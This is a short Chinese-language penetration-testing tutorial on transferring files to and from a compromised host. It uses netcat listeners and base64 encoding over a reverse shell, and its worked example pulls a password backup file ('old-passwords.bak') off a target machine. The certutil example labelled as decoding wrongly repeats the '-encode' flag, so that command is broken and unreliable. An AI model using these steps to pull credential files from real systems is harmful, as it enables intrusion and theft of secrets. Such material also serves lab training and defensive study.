【主机渗透】通过nc、或者base64编码从服务器上上传、下载文件
通过nc从目标机上上传、下载文件:
1、下载文件,文件在192.168.110.2服务器上,下载文件到192.168.110.1服务器
// 在 192.168.110.2(这台主机监听 5555 端口(注意符号是 "<" ) # nc -l 5555 < download.txt // 在 192.168.110.1 这台主机下载文件(注意符号是 ">" ) # nc --recv-only 192.168.110.2 5555 > download.txt
2、上传文件,文件在192.168.110.1服务器上,上传文件到192.168.110.2服务器
// 在 192.168.110.2 这台主机监听 5555 端口(注意符号是 ">" ) # nc -l 5555 > upload.txt // 在 192.168.110.1 这台主机上传文件(注意符号是 "<" ) # nc --send-only 192.168.110.2 5555 < upload.txt
通过base64编码的方式在反弹的shell上上传、下载文件:
环境:
目标机:Debian 4.9.30,ip:192.168.110.2,目标文件:/home/jim/backups/old-passwords.bak
下载机:kali 2020
下载步骤:
1、在已连接的shell上,对目标文件进行base64编码
base64 old-passwords.bak
base64工具语法:
对字符串编码、解码:
# 编码 echo -n "hello" | base64 # 解码 echo -n "hello" | base64 -d
对文件内容编码、解码:
# 编码 base64 file.txt # 解码 base64 -d file.txt
如果目标机是windows系统,可使用windows自带的certutil.exe工具进行base64编码,命令如下:
# 编码 certutil -encode originalFile.txt targetFile.txt # 解码 certutil -encode originalFile.txt targetFile.txt
2、将base64编码保存到一个txt文件下,并执行解码命令
base64 -d pass.txt
上传文件同理